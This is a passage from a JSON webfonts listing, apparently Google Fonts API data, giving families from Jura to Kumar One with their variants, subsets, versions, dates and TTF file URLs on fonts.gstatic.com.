        "600": "http://fonts.gstatic.com/s/jura/v15/z7NOdRfiaC4Vd8hhoPzfb5vBTP2D6quhTfmrH_rt.ttf",
        "700": "http://fonts.gstatic.com/s/jura/v15/z7NOdRfiaC4Vd8hhoPzfb5vBTP266quhTfmrH_rt.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Just Another Hand",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/justanotherhand/v12/845CNN4-AJyIGvIou-6yJKyptyOpOcr_BmmlS5aw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Just Me Again Down Here",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/justmeagaindownhere/v12/MwQmbgXtz-Wc6RUEGNMc0QpRrfUh2hSdBBMoAuwHvqDwc_fg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "K2D",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/k2d/v4/J7aRnpF2V0ErE6UpvrIw74NL.ttf",
        "100italic": "http://fonts.gstatic.com/s/k2d/v4/J7afnpF2V0EjdZ1NtLYS6pNLAjk.ttf",
        "200": "http://fonts.gstatic.com/s/k2d/v4/J7aenpF2V0Erv4QJlJw85ppSGw.ttf",
        "200italic": "http://fonts.gstatic.com/s/k2d/v4/J7acnpF2V0EjdZ3hlZY4xJ9CGyAa.ttf",
        "300": "http://fonts.gstatic.com/s/k2d/v4/J7aenpF2V0Er24cJlJw85ppSGw.ttf",
        "300italic": "http://fonts.gstatic.com/s/k2d/v4/J7acnpF2V0EjdZ2FlpY4xJ9CGyAa.ttf",
        "regular": "http://fonts.gstatic.com/s/k2d/v4/J7aTnpF2V0ETd68tnLcg7w.ttf",
        "italic": "http://fonts.gstatic.com/s/k2d/v4/J7aRnpF2V0EjdaUpvrIw74NL.ttf",
        "500": "http://fonts.gstatic.com/s/k2d/v4/J7aenpF2V0Erg4YJlJw85ppSGw.ttf",
        "500italic": "http://fonts.gstatic.com/s/k2d/v4/J7acnpF2V0EjdZ3dl5Y4xJ9CGyAa.ttf",
        "600": "http://fonts.gstatic.com/s/k2d/v4/J7aenpF2V0Err4EJlJw85ppSGw.ttf",
        "600italic": "http://fonts.gstatic.com/s/k2d/v4/J7acnpF2V0EjdZ3xkJY4xJ9CGyAa.ttf",
        "700": "http://fonts.gstatic.com/s/k2d/v4/J7aenpF2V0Ery4AJlJw85ppSGw.ttf",
        "700italic": "http://fonts.gstatic.com/s/k2d/v4/J7acnpF2V0EjdZ2VkZY4xJ9CGyAa.ttf",
        "800": "http://fonts.gstatic.com/s/k2d/v4/J7aenpF2V0Er14MJlJw85ppSGw.ttf",
        "800italic": "http://fonts.gstatic.com/s/k2d/v4/J7acnpF2V0EjdZ2JkpY4xJ9CGyAa.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kadwa",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin"
      ],
      "version": "v4",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kadwa/v4/rnCm-x5V0g7iphTHRcc2s2XH.ttf",
        "700": "http://fonts.gstatic.com/s/kadwa/v4/rnCr-x5V0g7ipix7auM-mHnOSOuk.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kalam",
      "variants": [
        "300",
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/kalam/v11/YA9Qr0Wd4kDdMtD6GgLLmCUItqGt.ttf",
        "regular": "http://fonts.gstatic.com/s/kalam/v11/YA9dr0Wd4kDdMuhWMibDszkB.ttf",
        "700": "http://fonts.gstatic.com/s/kalam/v11/YA9Qr0Wd4kDdMtDqHQLLmCUItqGt.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kameron",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kameron/v11/vm82dR7vXErQxuznsL4wL-XIYH8.ttf",
        "700": "http://fonts.gstatic.com/s/kameron/v11/vm8zdR7vXErQxuzniAIfC-3jfHb--NY.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kanit",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v7",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/kanit/v7/nKKX-Go6G5tXcr72GwWKcaxALFs.ttf",
        "100italic": "http://fonts.gstatic.com/s/kanit/v7/nKKV-Go6G5tXcraQI2GAdY5FPFtrGw.ttf",
        "200": "http://fonts.gstatic.com/s/kanit/v7/nKKU-Go6G5tXcr5aOiWgX6BJNUJy.ttf",
        "200italic": "http://fonts.gstatic.com/s/kanit/v7/nKKS-Go6G5tXcraQI82hVaRrMFJyAu4.ttf",
        "300": "http://fonts.gstatic.com/s/kanit/v7/nKKU-Go6G5tXcr4-OSWgX6BJNUJy.ttf",
        "300italic": "http://fonts.gstatic.com/s/kanit/v7/nKKS-Go6G5tXcraQI6miVaRrMFJyAu4.ttf",
        "regular": "http://fonts.gstatic.com/s/kanit/v7/nKKZ-Go6G5tXcoaSEQGodLxA.ttf",
        "italic": "http://fonts.gstatic.com/s/kanit/v7/nKKX-Go6G5tXcraQGwWKcaxALFs.ttf",
        "500": "http://fonts.gstatic.com/s/kanit/v7/nKKU-Go6G5tXcr5mOCWgX6BJNUJy.ttf",
        "500italic": "http://fonts.gstatic.com/s/kanit/v7/nKKS-Go6G5tXcraQI_GjVaRrMFJyAu4.ttf",
        "600": "http://fonts.gstatic.com/s/kanit/v7/nKKU-Go6G5tXcr5KPyWgX6BJNUJy.ttf",
        "600italic": "http://fonts.gstatic.com/s/kanit/v7/nKKS-Go6G5tXcraQI92kVaRrMFJyAu4.ttf",
        "700": "http://fonts.gstatic.com/s/kanit/v7/nKKU-Go6G5tXcr4uPiWgX6BJNUJy.ttf",
        "700italic": "http://fonts.gstatic.com/s/kanit/v7/nKKS-Go6G5tXcraQI7mlVaRrMFJyAu4.ttf",
        "800": "http://fonts.gstatic.com/s/kanit/v7/nKKU-Go6G5tXcr4yPSWgX6BJNUJy.ttf",
        "800italic": "http://fonts.gstatic.com/s/kanit/v7/nKKS-Go6G5tXcraQI6WmVaRrMFJyAu4.ttf",
        "900": "http://fonts.gstatic.com/s/kanit/v7/nKKU-Go6G5tXcr4WPCWgX6BJNUJy.ttf",
        "900italic": "http://fonts.gstatic.com/s/kanit/v7/nKKS-Go6G5tXcraQI4GnVaRrMFJyAu4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kantumruy",
      "variants": [
        "300",
        "regular",
        "700"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v9",
      "lastModified": "2020-10-08",
      "files": {
        "300": "http://fonts.gstatic.com/s/kantumruy/v9/syk0-yJ0m7wyVb-f4FOPUtDlpn-UJ1H6Uw.ttf",
        "regular": "http://fonts.gstatic.com/s/kantumruy/v9/sykx-yJ0m7wyVb-f4FO3_vjBrlSILg.ttf",
        "700": "http://fonts.gstatic.com/s/kantumruy/v9/syk0-yJ0m7wyVb-f4FOPQtflpn-UJ1H6Uw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Karla",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2019-12-08",
      "files": {
        "regular": "http://fonts.gstatic.com/s/karla/v13/qkBbXvYC6trAT4RSJN225aZO.ttf",
        "italic": "http://fonts.gstatic.com/s/karla/v13/qkBVXvYC6trAT7RQLtmU4LZOgAU.ttf",
        "700": "http://fonts.gstatic.com/s/karla/v13/qkBWXvYC6trAT7zuC_m-zrpHmRzC.ttf",
        "700italic": "http://fonts.gstatic.com/s/karla/v13/qkBQXvYC6trAT7RQFmW7xL5lnAzCKNg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Karma",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/karma/v11/va9F4kzAzMZRGLjDY8Z_uqzGQC_-.ttf",
        "regular": "http://fonts.gstatic.com/s/karma/v11/va9I4kzAzMZRGIBvS-J3kbDP.ttf",
        "500": "http://fonts.gstatic.com/s/karma/v11/va9F4kzAzMZRGLibYsZ_uqzGQC_-.ttf",
        "600": "http://fonts.gstatic.com/s/karma/v11/va9F4kzAzMZRGLi3ZcZ_uqzGQC_-.ttf",
        "700": "http://fonts.gstatic.com/s/karma/v11/va9F4kzAzMZRGLjTZMZ_uqzGQC_-.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Katibeh",
      "variants": [
        "regular"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/katibeh/v9/ZGjXol5MQJog4bxDaC1RVDNdGDs.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kaushan Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kaushanscript/v9/vm8vdRfvXFLG3OLnsO15WYS5DF7_ytN3M48a.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kavivanar",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "tamil"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kavivanar/v6/o-0IIpQgyXYSwhxP7_Jb4j5Ba_2c7A.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kavoon",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kavoon/v9/pxiFyp4_scRYhlU4NLr6f1pdEQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kdam Thmor",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v9",
      "lastModified": "2020-10-08",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kdamthmor/v9/MwQzbhjs3veF6QwJVf0JkGMViblPtXs.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Keania One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/keaniaone/v8/zOL54pXJk65E8pXardnuycRuv-hHkOs.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kelly Slab",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kellyslab/v11/-W_7XJX0Rz3cxUnJC5t6TkMBf50kbiM.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kenia",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kenia/v12/jizURE5PuHQH9qCONUGswfGM.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Khand",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/khand/v9/TwMN-IINQlQQ0bL5cFE3ZwaH__-C.ttf",
        "regular": "http://fonts.gstatic.com/s/khand/v9/TwMA-IINQlQQ0YpVWHU_TBqO.ttf",
        "500": "http://fonts.gstatic.com/s/khand/v9/TwMN-IINQlQQ0bKhcVE3ZwaH__-C.ttf",
        "600": "http://fonts.gstatic.com/s/khand/v9/TwMN-IINQlQQ0bKNdlE3ZwaH__-C.ttf",
        "700": "http://fonts.gstatic.com/s/khand/v9/TwMN-IINQlQQ0bLpd1E3ZwaH__-C.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Khmer",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/khmer/v13/MjQImit_vPPwpF-BpN2EeYmD.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Khula",
      "variants": [
        "300",
        "regular",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-11-06",
      "files": {
        "300": "http://fonts.gstatic.com/s/khula/v7/OpNPnoEOns3V7G-ljCvUrC59XwXD.ttf",
        "regular": "http://fonts.gstatic.com/s/khula/v7/OpNCnoEOns3V7FcJpA_chzJ0.ttf",
        "600": "http://fonts.gstatic.com/s/khula/v7/OpNPnoEOns3V7G_RiivUrC59XwXD.ttf",
        "700": "http://fonts.gstatic.com/s/khula/v7/OpNPnoEOns3V7G-1iyvUrC59XwXD.ttf",
        "800": "http://fonts.gstatic.com/s/khula/v7/OpNPnoEOns3V7G-piCvUrC59XwXD.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kirang Haerang",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kiranghaerang/v8/E21-_dn_gvvIjhYON1lpIU4-bcqvWPaJq4no.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kite One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kiteone/v8/70lQu7shLnA_E02vyq1b6HnGO4uA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Knewave",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/knewave/v9/sykz-yx0lLcxQaSItSq9-trEvlQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "KoHo",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/koho/v4/K2FxfZ5fmddNPuE1WJ75JoKhHys.ttf",
        "200italic": "http://fonts.gstatic.com/s/koho/v4/K2FzfZ5fmddNNisssJ_zIqCkDyvqZA.ttf",
        "300": "http://fonts.gstatic.com/s/koho/v4/K2FxfZ5fmddNPoU2WJ75JoKhHys.ttf",
        "300italic": "http://fonts.gstatic.com/s/koho/v4/K2FzfZ5fmddNNiss1JzzIqCkDyvqZA.ttf",
        "regular": "http://fonts.gstatic.com/s/koho/v4/K2F-fZ5fmddNBikefJbSOos.ttf",
        "italic": "http://fonts.gstatic.com/s/koho/v4/K2FwfZ5fmddNNisUeLTXKou4Bg.ttf",
        "500": "http://fonts.gstatic.com/s/koho/v4/K2FxfZ5fmddNPt03WJ75JoKhHys.ttf",
        "500italic": "http://fonts.gstatic.com/s/koho/v4/K2FzfZ5fmddNNissjJ3zIqCkDyvqZA.ttf",
        "600": "http://fonts.gstatic.com/s/koho/v4/K2FxfZ5fmddNPvEwWJ75JoKhHys.ttf",
        "600italic": "http://fonts.gstatic.com/s/koho/v4/K2FzfZ5fmddNNissoJrzIqCkDyvqZA.ttf",
        "700": "http://fonts.gstatic.com/s/koho/v4/K2FxfZ5fmddNPpUxWJ75JoKhHys.ttf",
        "700italic": "http://fonts.gstatic.com/s/koho/v4/K2FzfZ5fmddNNissxJvzIqCkDyvqZA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kodchasan",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/kodchasan/v4/1cX0aUPOAJv9sG4I-DJeR1Cggeqo3eMeoA.ttf",
        "200italic": "http://fonts.gstatic.com/s/kodchasan/v4/1cXqaUPOAJv9sG4I-DJWjUlIgOCs_-YOoIgN.ttf",
        "300": "http://fonts.gstatic.com/s/kodchasan/v4/1cX0aUPOAJv9sG4I-DJeI1Oggeqo3eMeoA.ttf",
        "300italic": "http://fonts.gstatic.com/s/kodchasan/v4/1cXqaUPOAJv9sG4I-DJWjUksg-Cs_-YOoIgN.ttf",
        "regular": "http://fonts.gstatic.com/s/kodchasan/v4/1cXxaUPOAJv9sG4I-DJmj3uEicG01A.ttf",
        "italic": "http://fonts.gstatic.com/s/kodchasan/v4/1cX3aUPOAJv9sG4I-DJWjXGAq8Sk1PoH.ttf",
        "500": "http://fonts.gstatic.com/s/kodchasan/v4/1cX0aUPOAJv9sG4I-DJee1Kggeqo3eMeoA.ttf",
        "500italic": "http://fonts.gstatic.com/s/kodchasan/v4/1cXqaUPOAJv9sG4I-DJWjUl0guCs_-YOoIgN.ttf",
        "600": "http://fonts.gstatic.com/s/kodchasan/v4/1cX0aUPOAJv9sG4I-DJeV1Wggeqo3eMeoA.ttf",
        "600italic": "http://fonts.gstatic.com/s/kodchasan/v4/1cXqaUPOAJv9sG4I-DJWjUlYheCs_-YOoIgN.ttf",
        "700": "http://fonts.gstatic.com/s/kodchasan/v4/1cX0aUPOAJv9sG4I-DJeM1Sggeqo3eMeoA.ttf",
        "700italic": "http://fonts.gstatic.com/s/kodchasan/v4/1cXqaUPOAJv9sG4I-DJWjUk8hOCs_-YOoIgN.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kosugi",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "japanese",
        "latin"
      ],
      "version": "v6",
      "lastModified": "2020-03-03",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kosugi/v6/pxiFyp4_v8FCjlI4NLr6f1pdEQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kosugi Maru",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "japanese",
        "latin"
      ],
      "version": "v6",
      "lastModified": "2020-03-03",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kosugimaru/v6/0nksC9PgP_wGh21A2KeqGiTqivr9iBq_.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kotta One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kottaone/v8/S6u_w41LXzPc_jlfNWqPHA3s5dwt7w.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Koulen",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/koulen/v14/AMOQz46as3KIBPeWgnA9kuYMUg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kranky",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kranky/v11/hESw6XVgJzlPsFnMpheEZo_H_w.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kreon",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v23",
      "lastModified": "2020-06-26",
      "files": {
        "300": "http://fonts.gstatic.com/s/kreon/v23/t5t9IRIUKY-TFF_LW5lnMR3v2DnvPNimejUfp2dWNg.ttf",
        "regular": "http://fonts.gstatic.com/s/kreon/v23/t5t9IRIUKY-TFF_LW5lnMR3v2DnvYtimejUfp2dWNg.ttf",
        "500": "http://fonts.gstatic.com/s/kreon/v23/t5t9IRIUKY-TFF_LW5lnMR3v2DnvUNimejUfp2dWNg.ttf",
        "600": "http://fonts.gstatic.com/s/kreon/v23/t5t9IRIUKY-TFF_LW5lnMR3v2DnvvN-mejUfp2dWNg.ttf",
        "700": "http://fonts.gstatic.com/s/kreon/v23/t5t9IRIUKY-TFF_LW5lnMR3v2Dnvhd-mejUfp2dWNg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kristi",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kristi/v12/uK_y4ricdeU6zwdRCh0TMv6EXw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Krona One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kronaone/v9/jAnEgHdjHcjgfIb1ZcUCMY-h3cWkWg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Krub",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/krub/v4/sZlEdRyC6CRYZo47KLF4R6gWaf8.ttf",
        "200italic": "http://fonts.gstatic.com/s/krub/v4/sZlGdRyC6CRYbkQiwLByQ4oTef_6gQ.ttf",
        "300": "http://fonts.gstatic.com/s/krub/v4/sZlEdRyC6CRYZuo4KLF4R6gWaf8.ttf",
        "300italic": "http://fonts.gstatic.com/s/krub/v4/sZlGdRyC6CRYbkQipLNyQ4oTef_6gQ.ttf",
        "regular": "http://fonts.gstatic.com/s/krub/v4/sZlLdRyC6CRYXkYQDLlTW6E.ttf",
        "italic": "http://fonts.gstatic.com/s/krub/v4/sZlFdRyC6CRYbkQaCJtWS6EPcA.ttf",
        "500": "http://fonts.gstatic.com/s/krub/v4/sZlEdRyC6CRYZrI5KLF4R6gWaf8.ttf",
        "500italic": "http://fonts.gstatic.com/s/krub/v4/sZlGdRyC6CRYbkQi_LJyQ4oTef_6gQ.ttf",
        "600": "http://fonts.gstatic.com/s/krub/v4/sZlEdRyC6CRYZp4-KLF4R6gWaf8.ttf",
        "600italic": "http://fonts.gstatic.com/s/krub/v4/sZlGdRyC6CRYbkQi0LVyQ4oTef_6gQ.ttf",
        "700": "http://fonts.gstatic.com/s/krub/v4/sZlEdRyC6CRYZvo_KLF4R6gWaf8.ttf",
        "700italic": "http://fonts.gstatic.com/s/krub/v4/sZlGdRyC6CRYbkQitLRyQ4oTef_6gQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kufam",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kufam/v2/C8c-4cY7pG7w_oSJDszBXsKCcBH3lqk7qQCJHvIwYg.ttf",
        "500": "http://fonts.gstatic.com/s/kufam/v2/C8c-4cY7pG7w_oSJDszBXsKCcBH3pKk7qQCJHvIwYg.ttf",
        "600": "http://fonts.gstatic.com/s/kufam/v2/C8c-4cY7pG7w_oSJDszBXsKCcBH3SK47qQCJHvIwYg.ttf",
        "700": "http://fonts.gstatic.com/s/kufam/v2/C8c-4cY7pG7w_oSJDszBXsKCcBH3ca47qQCJHvIwYg.ttf",
        "800": "http://fonts.gstatic.com/s/kufam/v2/C8c-4cY7pG7w_oSJDszBXsKCcBH3Fq47qQCJHvIwYg.ttf",
        "900": "http://fonts.gstatic.com/s/kufam/v2/C8c-4cY7pG7w_oSJDszBXsKCcBH3P647qQCJHvIwYg.ttf",
        "italic": "http://fonts.gstatic.com/s/kufam/v2/C8c84cY7pG7w_q6APDMZN6kY3hbiXurT6gqNPPcgYp0i.ttf",
        "500italic": "http://fonts.gstatic.com/s/kufam/v2/C8c84cY7pG7w_q6APDMZN6kY3hbiXurh6gqNPPcgYp0i.ttf",
        "600italic": "http://fonts.gstatic.com/s/kufam/v2/C8c84cY7pG7w_q6APDMZN6kY3hbiXuoN7QqNPPcgYp0i.ttf",
        "700italic": "http://fonts.gstatic.com/s/kufam/v2/C8c84cY7pG7w_q6APDMZN6kY3hbiXuo07QqNPPcgYp0i.ttf",
        "800italic": "http://fonts.gstatic.com/s/kufam/v2/C8c84cY7pG7w_q6APDMZN6kY3hbiXupT7QqNPPcgYp0i.ttf",
        "900italic": "http://fonts.gstatic.com/s/kufam/v2/C8c84cY7pG7w_q6APDMZN6kY3hbiXup67QqNPPcgYp0i.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kulim Park",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/kulimpark/v2/fdN49secq3hflz1Uu3IwjJYNwa5aZbUvGjU.ttf",
        "200italic": "http://fonts.gstatic.com/s/kulimpark/v2/fdNm9secq3hflz1Uu3IwhFwUKa9QYZcqCjVVUA.ttf",
        "300": "http://fonts.gstatic.com/s/kulimpark/v2/fdN49secq3hflz1Uu3IwjPIOwa5aZbUvGjU.ttf",
        "300italic": "http://fonts.gstatic.com/s/kulimpark/v2/fdNm9secq3hflz1Uu3IwhFwUTaxQYZcqCjVVUA.ttf",
        "regular": "http://fonts.gstatic.com/s/kulimpark/v2/fdN79secq3hflz1Uu3IwtF4m5aZxebw.ttf",
        "italic": "http://fonts.gstatic.com/s/kulimpark/v2/fdN59secq3hflz1Uu3IwhFws4YR0abw2Aw.ttf",
        "600": "http://fonts.gstatic.com/s/kulimpark/v2/fdN49secq3hflz1Uu3IwjIYIwa5aZbUvGjU.ttf",
        "600italic": "http://fonts.gstatic.com/s/kulimpark/v2/fdNm9secq3hflz1Uu3IwhFwUOapQYZcqCjVVUA.ttf",
        "700": "http://fonts.gstatic.com/s/kulimpark/v2/fdN49secq3hflz1Uu3IwjOIJwa5aZbUvGjU.ttf",
        "700italic": "http://fonts.gstatic.com/s/kulimpark/v2/fdNm9secq3hflz1Uu3IwhFwUXatQYZcqCjVVUA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kumar One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "gujarati",
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kumarone/v5/bMr1mS-P958wYi6YaGeGNO6WU3oT0g.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
